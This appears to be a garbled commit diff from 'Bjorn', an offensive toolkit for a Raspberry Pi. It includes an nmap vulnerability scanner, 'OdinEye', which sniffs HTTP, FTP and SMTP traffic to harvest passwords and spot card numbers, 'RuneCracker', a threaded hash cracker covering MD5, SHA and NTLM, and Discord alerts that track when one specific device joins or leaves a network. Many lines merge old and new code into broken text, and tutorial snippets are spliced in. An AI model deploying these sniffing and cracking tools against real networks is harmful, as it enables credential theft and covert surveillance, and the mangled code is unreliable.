                                'vuln_id': cve,
                                'script': 'vulners',
                                'details': str(script_out)[:200]
                            })
        return vulns
    def _scan_heavy(self, ip: str, port_list: str) -> List[Dict]:
        vulnerabilities: List[Dict] = []
        nm = nmap.PortScanner()  # Local instance
        vuln_scripts = [
            'vuln', 'exploit', 'http-vuln-*', 'smb-vuln-*',
            'ssl-*', 'ssh-*', 'ftp-vuln-*', 'mysql-vuln-*',
        ]
        script_arg = ','.join(vuln_scripts)
        # --min-rate/--max-rate so the Pi is not saturated
        args = (
            f"-sV --script={script_arg} -T3 "
            "--script-timeout 30s --min-rate 50 --max-rate 100"
        )
        logger.debug(f"[HEAVY] nmap {ip} -p {port_list}")
        try:
            nm.scan(hosts=ip, ports=port_list, arguments=args)
        except Exception as e:
            logger.error(f"Heavy batch scan failed for {ip} [{port_list}]: {e}")
            return vulnerabilities
        if ip not in nm.all_hosts():
            return vulnerabilities

        host = nm[ip]
        discovered_ports_in_batch: set = set()

        for proto in host.all_protocols():
            for port in host[proto].keys():
                discovered_ports_in_batch.add(str(port))
                port_info = host[proto][port]
                service = port_info.get('name', '') or ''

                for script_name, output in (port_info.get('script') or {}).items():
                    for cve in self.extract_cves(str(output)):
                        vulnerabilities.append({
                            'port': port,
                            'service': service,
                            'vuln_id': cve,
                            'script': script_name,
                            'details': str(output)[:200]
                        })

        # Optional CPE scan (on this batch)
        if bool(self.shared_data.config.get('scan_cpe', False)):
            ports_for_cpe = list(discovered_ports_in_batch)
            if ports_for_cpe:
                vulnerabilities.extend(self.scan_cpe(ip, ports_for_cpe))

        return vulnerabilities
    def scan_cpe(self, ip: str, ports: List[str]) -> List[Dict]:
        cpe_vulns = []
        nm = nmap.PortScanner()  # Local instance
        try:
            port_list = ','.join([str(p) for p in ports])
            # --version-light instead of --version-all (much faster)
            args = "-sV --version-light -T4 --max-retries 1 --host-timeout 45s"
            nm.scan(hosts=ip, ports=port_list, arguments=args)
            if ip in nm.all_hosts():
                host = nm[ip]
                for proto in host.all_protocols():
                    for port in host[proto].keys():
                        port_info = host[proto][port]
@@ -319,90 +400,61 @@ class NmapVulnScanner:
                            'service': service,
                            'vuln_id': f"CPE:{cpe}",
                            'script': 'version-scan',
                            'details': f"CPE: {cpe}"
                        })
        except Exception as e:
            logger.error(f"scan_cpe failed for {ip}: {e}")
        return cpe_vulns
    # ---------------------------- Persistence ---------------------------- #
    def save_vulnerabilities(self, mac: str, ip: str, findings: List[Dict]):
        hostname = None
        try:
            host_row = self.shared_data.db.query_one(
                "SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
            )
            if host_row and host_row.get('hostnames'):
                hostname = host_row['hostnames'].split(';')[0]
        except Exception:
            pass

        findings_by_port: Dict[int, Dict] = {}
        for f in findings:
            port = int(f.get('port', 0) or 0)
            if port not in findings_by_port:
                findings_by_port[port] = {'cves': set(), 'cpes': set()}
            vid = str(f.get('vuln_id', ''))
            vid_upper = vid.upper()
            if vid_upper.startswith('CVE-'):
                findings_by_port[port]['cves'].add(vid)
            elif vid_upper.startswith('CPE:'):
                # Stored without the "CPE:" prefix
                findings_by_port[port]['cpes'].add(vid[4:])

        # 1) CVEs
        for port, data in findings_by_port.items():
            for cve in data['cves']:
                try:
                    self.shared_data.db.execute("""
                        INSERT INTO vulnerabilities(mac_address, ip, hostname, port, vuln_id, is_active, last_seen)
                        VALUES(?,?,?,?,?,1,CURRENT_TIMESTAMP)
                        ON CONFLICT(mac_address, vuln_id, port) DO UPDATE SET
                            is_active=1, last_seen=CURRENT_TIMESTAMP, ip=excluded.ip
                    """, (mac, ip, hostname, port, cve))
                except Exception as e:
                    logger.error(f"Save CVE err: {e}")

        # 2) CPEs
        for port, data in findings_by_port.items():
            for cpe in data['cpes']:
                try:
                    self.shared_data.db.add_detected_software(
                        mac_address=mac, cpe=cpe, ip=ip,
                        hostname=hostname, port=port
                    )
                except Exception as e:
                    logger.error(f"Save CPE err: {e}")

        logger.info(f"Saved vulnerabilities for {ip}: {len(findings)} findings")
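The CVE write above uses SQLite's UPSERT form (`INSERT ... ON CONFLICT ... DO UPDATE`), which only works when `(mac_address, vuln_id, port)` is covered by a UNIQUE constraint or index; otherwise SQLite raises an error instead of updating. A self-contained demonstration with a simplified schema (Bjorn's real table definition is not shown in this diff):

```python
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("""
    CREATE TABLE vulnerabilities(
        mac_address TEXT, ip TEXT, port INTEGER, vuln_id TEXT,
        is_active INTEGER, last_seen TEXT,
        UNIQUE(mac_address, vuln_id, port)  -- required by ON CONFLICT below
    )
""")
upsert = """
    INSERT INTO vulnerabilities(mac_address, ip, port, vuln_id, is_active, last_seen)
    VALUES(?,?,?,?,1,CURRENT_TIMESTAMP)
    ON CONFLICT(mac_address, vuln_id, port) DO UPDATE SET
        is_active=1, last_seen=CURRENT_TIMESTAMP, ip=excluded.ip
"""
db.execute(upsert, ("aa:bb", "10.0.0.5", 445, "CVE-2017-0144"))
db.execute(upsert, ("aa:bb", "10.0.0.9", 445, "CVE-2017-0144"))  # same key: row is updated

rows = db.execute("SELECT ip FROM vulnerabilities").fetchall()
assert rows == [("10.0.0.9",)]  # still one row, ip refreshed by the second upsert
```

This replaces the older SELECT-then-INSERT/UPDATE round trip with a single statement, which also avoids a race between the check and the write.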

View File

@@ -1,110 +1,85 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
odin_eye.py -- Network traffic analyzer and credential hunter for BJORN.
Uses pyshark to capture and analyze packets in real-time.
"""
import os import os
import json
try: try:
import psutil import pyshark
except Exception: HAS_PYSHARK = True
psutil = None except ImportError:
pyshark = None
HAS_PYSHARK = False
import re
import threading
import time
import logging
from datetime import datetime
def _list_net_ifaces() -> list[str]: from collections import defaultdict
names = set() from typing import Any, Dict, List, Optional
# 1) psutil si dispo
if psutil:
try:
names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
except Exception:
pass
# 2) fallback kernel
try:
for n in os.listdir("/sys/class/net"):
if n and n != "lo":
names.add(n)
except Exception:
pass
out = ["auto"] + sorted(names)
# sécurité: pas de doublons
seen, unique = set(), []
for x in out:
if x not in seen:
unique.append(x); seen.add(x)
return unique
from logger import Logger
# Hook appelée par le backend avant affichage UI / sync DB logger = Logger(name="odin_eye.py")
def compute_dynamic_b_args(base: dict) -> dict:
"""
Compute dynamic arguments at runtime.
Called by the web interface to populate dropdowns, etc.
"""
d = dict(base or {})
# Example: Dynamic interface list
if "interface" in d:
import psutil
interfaces = ["auto"]
try:
for ifname in psutil.net_if_addrs().keys():
if ifname != "lo":
interfaces.append(ifname)
except:
interfaces.extend(["wlan0", "eth0"])
d["interface"]["choices"] = interfaces
return d
# --- MÉTADONNÉES UI SUPPLÉMENTAIRES ----------------------------------------- # -------------------- Action metadata --------------------
# Exemples darguments (affichage frontend; aussi persisté en DB via sync_actions)
b_examples = [
{"interface": "auto", "filter": "http or ftp", "timeout": 120, "max_packets": 5000, "save_credentials": True},
{"interface": "wlan0", "filter": "(http or smtp) and not broadcast", "timeout": 300, "max_packets": 10000},
]
# Lien MD (peut être un chemin local servi par votre frontend, ou un http(s))
# Exemple: un README markdown stocké dans votre repo
b_docs_url = "docs/actions/OdinEye.md"
# --- Métadonnées d'action (consommées par shared.generate_actions_json) -----
b_class = "OdinEye" b_class = "OdinEye"
b_module = "odin_eye" # nom du fichier sans .py b_module = "odin_eye"
b_enabled = 0 b_status = "odin_eye"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 30
b_cooldown = 0
b_rate_limit = None
b_timeout = 600
b_max_retries = 1
b_stealth_level = 4  # Capturing is passive, but pyshark can be resource intensive
b_risk_level = "low"
b_enabled = 1
b_tags = ["sniff", "pcap", "creds", "network"]
b_category = "recon"
b_name = "Odin Eye"
b_description = "Passive network analyzer that hunts for credentials and data patterns."
b_author = "Bjorn Team"
b_version = "2.0.1"
b_icon = "OdinEye.png"

# Arguments schema for the dynamic UI (key == flag name without '--')
b_args = {
    "interface": {
        "type": "select",
        "label": "Network Interface",
        "choices": ["auto", "wlan0", "eth0"],
        "default": "auto",
        "help": "Interface to listen on."
    },
    "filter": {
        "type": "text",
        "label": "BPF Filter",
        "default": "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"
    },
    "max_packets": {
        "type": "number",
        "label": "Max packets",
        "min": 100,
        "max": 100000,
        "step": 100,
        "default": 1000
    },
    "save_creds": {
        "type": "checkbox",
        "label": "Save Credentials",
        "default": True
    }
}
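The `interface` field above ships with static choices; the action template later in this commit defines a `compute_dynamic_b_args` hook intended to fill such fields at runtime. A minimal sketch using only the standard library — the helper body here is illustrative, not the project's actual implementation:

```python
import socket

def compute_dynamic_b_args(base: dict) -> dict:
    """Fill the 'interface' choices from the kernel's interface list (illustrative body)."""
    args = {k: dict(v) for k, v in base.items()}  # shallow-copy so the base schema is untouched
    try:
        names = [name for _, name in socket.if_nameindex()]
    except OSError:
        names = []
    args["interface"]["choices"] = ["auto"] + [n for n in names if n != "lo"]
    return args

schema = {"interface": {"type": "select", "label": "Network Interface",
                        "choices": [], "default": "auto"}}
print(compute_dynamic_b_args(schema)["interface"]["choices"][0])  # auto
```

`socket.if_nameindex()` avoids a dependency on `psutil`; the loopback interface is filtered out since it is rarely useful for sniffing.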
# ----------------- Analysis code -----------------------
import os
import json
import re
import threading
import time
from collections import defaultdict
from datetime import datetime
from typing import Any, Dict, List

import pyshark

from logger import Logger

logger = Logger(name="odin_eye.py")

DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/packets"
DEFAULT_FILTER = "(http or ftp or smtp or pop3 or imap or telnet) and not broadcast"
CREDENTIAL_PATTERNS = {
    'http': {
        'username': [r'username=([^&]+)', r'user=([^&]+)', r'login=([^&]+)'],
@@ -120,297 +95,153 @@ CREDENTIAL_PATTERNS = {
}

class OdinEye:
    def __init__(self, shared_data):
        self.shared_data = shared_data
        self.capture = None
        self.stop_event = threading.Event()
        self.statistics = defaultdict(int)
        self.credentials: List[Dict[str, Any]] = []
        self.lock = threading.Lock()

    def process_packet(self, packet):
        """Analyze a single packet for patterns and credentials."""
        try:
            with self.lock:
                self.statistics['total_packets'] += 1
                if hasattr(packet, 'highest_layer'):
                    self.statistics[packet.highest_layer] += 1
            if hasattr(packet, 'tcp'):
                # HTTP
                if hasattr(packet, 'http'):
                    self._analyze_http(packet)
                # FTP
                elif hasattr(packet, 'ftp'):
                    self._analyze_ftp(packet)
                # SMTP
                elif hasattr(packet, 'smtp'):
                    self._analyze_smtp(packet)
                # Payload generic check
                if hasattr(packet.tcp, 'payload'):
                    self._analyze_payload(packet.tcp.payload)
        except Exception as e:
            logger.debug(f"Packet processing error: {e}")

    def _analyze_http(self, packet):
        if hasattr(packet.http, 'request_uri'):
            uri = packet.http.request_uri
            for field in ['username', 'password']:
                for pattern in CREDENTIAL_PATTERNS['http'][field]:
                    m = re.findall(pattern, uri, re.I)
                    if m:
                        self._add_cred('HTTP', field, m[0], getattr(packet.ip, 'src', 'unknown'))

    def _analyze_ftp(self, packet):
        if hasattr(packet.ftp, 'request_command'):
            cmd = packet.ftp.request_command.upper()
            if cmd in ['USER', 'PASS']:
                field = 'username' if cmd == 'USER' else 'password'
                self._add_cred('FTP', field, packet.ftp.request_arg, getattr(packet.ip, 'src', 'unknown'))

    def _analyze_smtp(self, packet):
        if hasattr(packet.smtp, 'command_line'):
            line = packet.smtp.command_line
            for pattern in CREDENTIAL_PATTERNS['smtp']['auth']:
                m = re.findall(pattern, line, re.I)
                if m:
                    self._add_cred('SMTP', 'auth', m[0], getattr(packet.ip, 'src', 'unknown'))

    def _analyze_payload(self, payload):
        patterns = {
            'email': r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}',
            'credit_card': r'\b\d{4}[- ]?\d{4}[- ]?\d{4}[- ]?\d{4}\b'
        }
        for name, pattern in patterns.items():
            m = re.findall(pattern, payload)
            if m:
                self.shared_data.log_milestone(b_class, "PatternFound", f"{name} detected in traffic")

    def _add_cred(self, proto, field, value, source):
        with self.lock:
            cred = {
                'protocol': proto,
                'type': field,
                'value': value,
                'timestamp': datetime.now().isoformat(),
                'source': source
            }
            if cred not in self.credentials:
                self.credentials.append(cred)
                logger.success(f"OdinEye: Credential found! [{proto}] {field}={value}")
                self.shared_data.log_milestone(b_class, "Credential", f"{proto} {field} captured")
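The HTTP credential regexes above can be exercised in isolation. This standalone sketch applies the same `username` pattern list to a request URI; the `extract_usernames` helper name is illustrative, not part of the action:

```python
import re

# Same 'username' regex list as CREDENTIAL_PATTERNS['http']['username'] above.
USERNAME_PATTERNS = [r'username=([^&]+)', r'user=([^&]+)', r'login=([^&]+)']

def extract_usernames(uri: str) -> list:
    """Collect every username-looking value from a request URI."""
    found = []
    for pat in USERNAME_PATTERNS:
        found.extend(re.findall(pat, uri, re.I))
    return found

print(extract_usernames("/login.php?username=alice&password=s3cret"))  # ['alice']
```

Note that `re.I` matches `USERNAME=` as well, and `[^&]+` stops each capture at the next query-string separator.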
    def execute(self, ip, port, row, status_key) -> str:
        """Standard entry point."""
        iface = getattr(self.shared_data, "odin_eye_interface", "auto")
        if iface == "auto":
            iface = None  # pyshark handles None as default
        bpf_filter = getattr(self.shared_data, "odin_eye_filter", b_args["filter"]["default"])
        max_pkts = int(getattr(self.shared_data, "odin_eye_max_packets", 1000))
        timeout = int(getattr(self.shared_data, "odin_eye_timeout", 300))
        output_dir = getattr(self.shared_data, "odin_eye_output", "/home/bjorn/Bjorn/data/output/packets")

        logger.info(f"OdinEye: Starting capture on {iface or 'default'} (filter: {bpf_filter})")
        self.shared_data.log_milestone(b_class, "Startup", f"Sniffing on {iface or 'any'}")

        try:
            self.capture = pyshark.LiveCapture(interface=iface, bpf_filter=bpf_filter)

            start_time = time.time()
            packet_count = 0

            # Use sniff_continuously for real-time processing
            for packet in self.capture.sniff_continuously():
                if self.shared_data.orchestrator_should_exit:
                    break
                if time.time() - start_time > timeout:
                    logger.info("OdinEye: Timeout reached.")
                    break
                packet_count += 1
                if packet_count >= max_pkts:
                    logger.info("OdinEye: Max packets reached.")
                    break
                self.process_packet(packet)

                # Periodic progress update (every 50 packets)
                if packet_count % 50 == 0:
                    prog = int((packet_count / max_pkts) * 100)
                    self.shared_data.bjorn_progress = f"{prog}%"
                    self.shared_data.log_milestone(b_class, "Status", f"Captured {packet_count} packets")
        except Exception as e:
            logger.error(f"Capture error: {e}")
            self.shared_data.log_milestone(b_class, "Error", str(e))
            return "failed"
        finally:
            if self.capture:
                try:
                    self.capture.close()
                except Exception:
                    pass

        # Save results
        if self.credentials or self.statistics['total_packets'] > 0:
            os.makedirs(output_dir, exist_ok=True)
            ts = datetime.now().strftime("%Y%m%d_%H%M%S")
            with open(os.path.join(output_dir, f"odin_recon_{ts}.json"), 'w') as f:
                json.dump({
                    "stats": dict(self.statistics),
                    "credentials": self.credentials
                }, f, indent=4)

        self.shared_data.log_milestone(b_class, "Complete", f"Capture finished. {len(self.credentials)} creds found.")
        return "success"

if __name__ == "__main__":
    from init_shared import shared_data
    eye = OdinEye(shared_data)
    eye.execute("0.0.0.0", None, {}, "odin_eye")
"""
# action_template.py
# Example template for a Bjorn action with Neo launcher support
# UI Metadata
b_class = "MyAction"
b_module = "my_action"
b_enabled = 1
b_action = "normal" # normal, aggressive, stealth
b_description = "Description of what this action does"
# Arguments schema for UI
b_args = {
"target": {
"type": "text",
"label": "Target IP/Host",
"default": "192.168.1.1",
"placeholder": "Enter target",
"help": "The target to scan"
},
"port": {
"type": "number",
"label": "Port",
"default": 80,
"min": 1,
"max": 65535
},
"protocol": {
"type": "select",
"label": "Protocol",
"choices": ["tcp", "udp"],
"default": "tcp"
},
"verbose": {
"type": "checkbox",
"label": "Verbose output",
"default": False
},
"timeout": {
"type": "slider",
"label": "Timeout (seconds)",
"min": 10,
"max": 300,
"step": 10,
"default": 60
}
}
def compute_dynamic_b_args(base: dict) -> dict:
# Compute dynamic values at runtime
return base
import argparse
import sys
def main():
parser = argparse.ArgumentParser(description=b_description)
parser.add_argument('--target', default=b_args['target']['default'])
parser.add_argument('--port', type=int, default=b_args['port']['default'])
parser.add_argument('--protocol', choices=b_args['protocol']['choices'],
default=b_args['protocol']['default'])
parser.add_argument('--verbose', action='store_true')
parser.add_argument('--timeout', type=int, default=b_args['timeout']['default'])
args = parser.parse_args()
# Your action logic here
print(f"Starting action with target: {args.target}")
# ...
if __name__ == "__main__":
main()
"""
@@ -10,7 +10,8 @@ PresenceJoin — Sends a Discord webhook when the targeted host JOINS the network
import requests
from typing import Optional
import logging
import datetime

from logger import Logger
from shared import SharedData  # only if executed directly for testing

@@ -29,19 +30,19 @@ b_rate_limit = None
b_trigger = "on_join"   # <-- Host JOINED the network (OFF -> ON since last scan)
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]}  # adapt as needed

DISCORD_WEBHOOK_URL = ""  # Configure via shared_data or DB

class PresenceJoin:
    def __init__(self, shared_data):
        self.shared_data = shared_data

    def _send(self, text: str) -> None:
        url = getattr(self.shared_data, 'discord_webhook_url', None) or DISCORD_WEBHOOK_URL
        if not url or "webhooks/" not in url:
            logger.error("PresenceJoin: DISCORD_WEBHOOK_URL missing/invalid.")
            return
        try:
            r = requests.post(url, json={"content": text}, timeout=6)
            if r.status_code < 300:
                logger.info("PresenceJoin: webhook sent.")
            else:

@@ -61,7 +62,8 @@ class PresenceJoin:
        ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
        # Add timestamp in UTC
        timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
        msg = f"✅ **Presence detected**\n"
        msg += f"- Host: {host or 'unknown'}\n"
@@ -10,7 +10,8 @@ PresenceLeave — Sends a Discord webhook when the targeted host LEAVES the network
import requests
from typing import Optional
import logging
import datetime

from logger import Logger
from shared import SharedData  # only if executed directly for testing

@@ -30,19 +31,19 @@ b_trigger = "on_leave"   # <-- Host LEFT the network (ON -> OFF since last scan)
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]}  # adapt as needed
b_enabled = 1

DISCORD_WEBHOOK_URL = ""  # Configure via shared_data or DB

class PresenceLeave:
    def __init__(self, shared_data):
        self.shared_data = shared_data

    def _send(self, text: str) -> None:
        url = getattr(self.shared_data, 'discord_webhook_url', None) or DISCORD_WEBHOOK_URL
        if not url or "webhooks/" not in url:
            logger.error("PresenceLeave: DISCORD_WEBHOOK_URL missing/invalid.")
            return
        try:
            r = requests.post(url, json={"content": text}, timeout=6)
            if r.status_code < 300:
                logger.info("PresenceLeave: webhook sent.")
            else:

@@ -61,7 +62,8 @@ class PresenceLeave:
        ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
        # Add timestamp in UTC
        timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
        msg = f"❌ **Presence lost**\n"
        msg += f"- Host: {host or 'unknown'}\n"
@@ -1,35 +1,52 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
rune_cracker.py -- Advanced password cracker for BJORN.
Supports multiple hash formats and uses bruteforce_common for progress tracking.
Optimized for Pi Zero 2 (limited CPU/RAM).
"""

import os
import json
import hashlib
import re
import threading
import time
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor
from typing import Any, Dict, List, Optional, Set

from logger import Logger
from actions.bruteforce_common import ProgressTracker, merged_password_plan

logger = Logger(name="rune_cracker.py")

# -------------------- Action metadata --------------------
b_class = "RuneCracker"
b_module = "rune_cracker"
b_status = "rune_cracker"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 40
b_cooldown = 0
b_rate_limit = None
b_timeout = 600
b_max_retries = 1
b_stealth_level = 10  # Local cracking is stealthy
b_risk_level = "low"
b_enabled = 1
b_tags = ["crack", "hash", "bruteforce", "local"]
b_category = "exploitation"
b_name = "Rune Cracker"
b_description = "Advanced password cracker with mutation rules and progress tracking."
b_author = "Bjorn Team"
b_version = "2.1.0"
b_icon = "RuneCracker.png"

# Supported hash types and their patterns
HASH_PATTERNS = {
@@ -40,226 +57,153 @@ HASH_PATTERNS = {
    'ntlm': r'^[a-fA-F0-9]{32}$'
}
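Only the `ntlm` entry of `HASH_PATTERNS` is visible in this hunk; the remaining patterns presumably follow the standard hex digest lengths (32/40/64/128 characters). A sketch of the auto-detection step, with the caveat that a 32-character hex string matches both `md5` and `ntlm` (all pattern values besides `ntlm` are assumptions based on those lengths):

```python
import hashlib
import re

# Pattern values other than 'ntlm' are assumed from standard digest lengths.
HASH_PATTERNS = {
    'md5': r'^[a-fA-F0-9]{32}$',
    'sha1': r'^[a-fA-F0-9]{40}$',
    'sha256': r'^[a-fA-F0-9]{64}$',
    'sha512': r'^[a-fA-F0-9]{128}$',
    'ntlm': r'^[a-fA-F0-9]{32}$',
}

def detect_types(hash_value: str) -> list:
    """Return every hash type whose pattern matches (ambiguity is possible)."""
    return [t for t, pat in HASH_PATTERNS.items() if re.match(pat, hash_value)]

print(detect_types(hashlib.sha256(b"admin").hexdigest()))  # ['sha256']
print(detect_types(hashlib.md5(b"admin").hexdigest()))     # ['md5', 'ntlm']
```

This ambiguity is why the loader below breaks on the first matching pattern when no explicit `hash_type` is configured.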
class RuneCracker:
    def __init__(self, shared_data):
        self.shared_data = shared_data
        self.hashes: Set[str] = set()
        self.cracked: Dict[str, Dict[str, Any]] = {}
        self.lock = threading.Lock()
        self.hash_type: Optional[str] = None
        # Performance tuning for Pi Zero 2
        self.max_workers = int(getattr(shared_data, "rune_cracker_workers", 4))

    def _hash_password(self, password: str, h_type: str) -> Optional[str]:
        """Generate hash for a password using the specified algorithm."""
        try:
            if h_type == 'md5':
                return hashlib.md5(password.encode()).hexdigest()
            elif h_type == 'sha1':
                return hashlib.sha1(password.encode()).hexdigest()
            elif h_type == 'sha256':
                return hashlib.sha256(password.encode()).hexdigest()
            elif h_type == 'sha512':
                return hashlib.sha512(password.encode()).hexdigest()
            elif h_type == 'ntlm':
                # NTLM is MD4(UTF-16LE(password))
                return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
        except Exception as e:
            logger.debug(f"Hashing error ({h_type}): {e}")
        return None
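Stripped of threading and metadata, `_hash_password` plus the set-membership test reduces to a plain dictionary attack loop. A self-contained sketch for MD5 only (the `crack_md5` helper is illustrative, not part of the action):

```python
import hashlib
from typing import Iterable, Optional

def crack_md5(target_hash: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose MD5 digest equals target_hash, else None."""
    for pwd in candidates:
        if hashlib.md5(pwd.encode()).hexdigest() == target_hash:
            return pwd
    return None

target = hashlib.md5(b"qwerty").hexdigest()
print(crack_md5(target, ["password", "admin", "qwerty"]))  # qwerty
```

RuneCracker generalizes this loop over every hash type, dedupes results under a lock, and hands wordlist construction off to `merged_password_plan`.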
    def _crack_password_worker(self, password: str, progress: ProgressTracker):
        """Worker function for cracking passwords."""
        if self.shared_data.orchestrator_should_exit:
            return

        for h_type in HASH_PATTERNS.keys():
            if self.hash_type and self.hash_type != h_type:
                continue

            hv = self._hash_password(password, h_type)
            if hv and hv in self.hashes:
                with self.lock:
                    if hv not in self.cracked:
                        self.cracked[hv] = {
                            "password": password,
                            "type": h_type,
                            "cracked_at": datetime.now().isoformat()
                        }
                        logger.success(f"Cracked {h_type}: {hv[:8]}... -> {password}")
                        self.shared_data.log_milestone(b_class, "Cracked", f"{h_type} found!")

        progress.advance()
def execute(self, ip, port, row, status_key) -> str:
"""Standard Orchestrator entry point."""
input_file = str(getattr(self.shared_data, "rune_cracker_input", ""))
wordlist_path = str(getattr(self.shared_data, "rune_cracker_wordlist", ""))
self.hash_type = getattr(self.shared_data, "rune_cracker_type", None)
output_dir = getattr(self.shared_data, "rune_cracker_output", "/home/bjorn/Bjorn/data/output/hashes")
if not input_file or not os.path.exists(input_file):
# Fallback: Check for latest odin_recon or other hashes if running in generic mode
potential_input = os.path.join(self.shared_data.data_dir, "output", "packets", "latest_hashes.txt")
if os.path.exists(potential_input):
input_file = potential_input
logger.info(f"RuneCracker: No input provided, using fallback: {input_file}")
else:
logger.error(f"Input file not found: {input_file}")
return "failed"
# Load hashes
self.hashes.clear()
try: try:
logging.info("Starting password cracking process") with open(input_file, 'r', encoding="utf-8", errors="ignore") as f:
self.load_hashes() for line in f:
hv = line.strip()
if not self.hashes: if not hv: continue
logging.error("No valid hashes loaded") # Auto-detect or validate
return for h_t, pat in HASH_PATTERNS.items():
if re.match(pat, hv):
wordlist = self.load_wordlist() if not self.hash_type or self.hash_type == h_t:
self.hashes.add(hv)
with ThreadPoolExecutor(max_workers=10) as executor: break
executor.map(self.crack_password, wordlist)
self.save_results()
logging.info(f"Cracking completed. Cracked {len(self.cracked)}/{len(self.hashes)} hashes")
except Exception as e: except Exception as e:
logging.error(f"Error during execution: {e}") logger.error(f"Error loading hashes: {e}")
return "failed"
def save_settings(input_file, wordlist, rules, hash_type, output_dir): if not self.hashes:
"""Save settings to JSON file.""" logger.warning("No valid hashes found in input file.")
try: return "failed"
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = { logger.info(f"RuneCracker: Loaded {len(self.hashes)} hashes. Starting engine...")
"input_file": input_file, self.shared_data.log_milestone(b_class, "Initialization", f"Loaded {len(self.hashes)} hashes")
"wordlist": wordlist,
"rules": rules, # Prepare password plan
"hash_type": hash_type, dict_passwords = []
"output_dir": output_dir if wordlist_path and os.path.exists(wordlist_path):
} with open(wordlist_path, 'r', encoding="utf-8", errors="ignore") as f:
with open(SETTINGS_FILE, 'w') as f: dict_passwords = [l.strip() for l in f if l.strip()]
json.dump(settings, f) else:
logging.info(f"Settings saved to {SETTINGS_FILE}") # Fallback tiny list
except Exception as e: dict_passwords = ['password', 'admin', '123456', 'qwerty', 'bjorn']
logging.error(f"Failed to save settings: {e}")
# --- removed (old tail of rune_cracker.py) ---
def load_settings():
    """Load settings from JSON file."""
    if os.path.exists(SETTINGS_FILE):
        try:
            with open(SETTINGS_FILE, 'r') as f:
                return json.load(f)
        except Exception as e:
            logging.error(f"Failed to load settings: {e}")
    return {}

def main():
    parser = argparse.ArgumentParser(description="Advanced password cracker")
    parser.add_argument("-i", "--input", help="Input file containing hashes")
    parser.add_argument("-w", "--wordlist", help="Path to password wordlist")
    parser.add_argument("-r", "--rules", help="Path to rules file")
    parser.add_argument("-t", "--type", choices=list(HASH_PATTERNS.keys()), help="Hash type")
    parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
    args = parser.parse_args()

    settings = load_settings()
    input_file = args.input or settings.get("input_file")
    wordlist = args.wordlist or settings.get("wordlist")
    rules = args.rules or settings.get("rules")
    hash_type = args.type or settings.get("hash_type")
    output_dir = args.output or settings.get("output_dir")

    if not input_file:
        logging.error("Input file is required. Use -i or save it in settings")
        return
    save_settings(input_file, wordlist, rules, hash_type, output_dir)
    cracker = RuneCracker(
        input_file=input_file,
        wordlist=wordlist,
        rules=rules,
        hash_type=hash_type,
        output_dir=output_dir
    )
    cracker.execute()

if __name__ == "__main__":
    main()

# --- added (new tail of rune_cracker.py) ---
        dictionary, fallback = merged_password_plan(self.shared_data, dict_passwords)
        all_candidates = dictionary + fallback
        progress = ProgressTracker(self.shared_data, len(all_candidates))
        self.shared_data.log_milestone(b_class, "Bruteforce", f"Testing {len(all_candidates)} candidates")
        try:
            with ThreadPoolExecutor(max_workers=self.max_workers) as executor:
                for pwd in all_candidates:
                    if self.shared_data.orchestrator_should_exit:
                        executor.shutdown(wait=False)
                        return "interrupted"
                    executor.submit(self._crack_password_worker, pwd, progress)
        except Exception as e:
            logger.error(f"Cracking engine error: {e}")
            return "failed"

        # Save results
        if self.cracked:
            os.makedirs(output_dir, exist_ok=True)
            out_file = os.path.join(output_dir, f"cracked_{int(time.time())}.json")
            with open(out_file, 'w', encoding="utf-8") as f:
                json.dump({
                    "target_file": input_file,
                    "total_hashes": len(self.hashes),
                    "cracked_count": len(self.cracked),
                    "results": self.cracked
                }, f, indent=4)
            logger.success(f"Cracked {len(self.cracked)} hashes! Results: {out_file}")
            self.shared_data.log_milestone(b_class, "Complete", f"Cracked {len(self.cracked)} hashes")
            return "success"

        logger.info("Cracking finished. No matches found.")
        self.shared_data.log_milestone(b_class, "Finished", "No passwords found")
        return "success"  # Still success even if 0 cracked, as it finished the task

if __name__ == "__main__":
    # Minimal CLI for testing
    import sys
    from init_shared import shared_data
    if len(sys.argv) < 2:
        print("Usage: rune_cracker.py <hash_file>")
        sys.exit(1)
    shared_data.rune_cracker_input = sys.argv[1]
    cracker = RuneCracker(shared_data)
    cracker.execute("local", None, {}, "rune_cracker")
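The submit-loop with early shutdown used by the cracking engine can be exercised in isolation. This is a minimal sketch, not the repository's API: `run_candidates`, the `worker` callable, and the `should_exit` probe are hypothetical names standing in for `_crack_password_worker` and the orchestrator exit flag.

```python
from concurrent.futures import ThreadPoolExecutor

def run_candidates(candidates, worker, should_exit, max_workers=4):
    # Submit each candidate to a bounded pool; abandon queued work as soon
    # as the exit probe fires, mirroring the engine's "interrupted" path.
    try:
        with ThreadPoolExecutor(max_workers=max_workers) as executor:
            for cand in candidates:
                if should_exit():
                    executor.shutdown(wait=False)
                    return "interrupted"
                executor.submit(worker, cand)
    except Exception:
        return "failed"
    return "success"
```

Exiting the `with` block still performs a final blocking shutdown, so on the "success" path all submitted work has completed before the function returns.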

View File

@@ -1,20 +1,24 @@
# scanning.py Network scanner (DB-first, no stubs) # scanning.py Network scanner (DB-first, no stubs)
# - Host discovery (nmap -sn -PR) # - Host discovery (nmap -sn -PR)
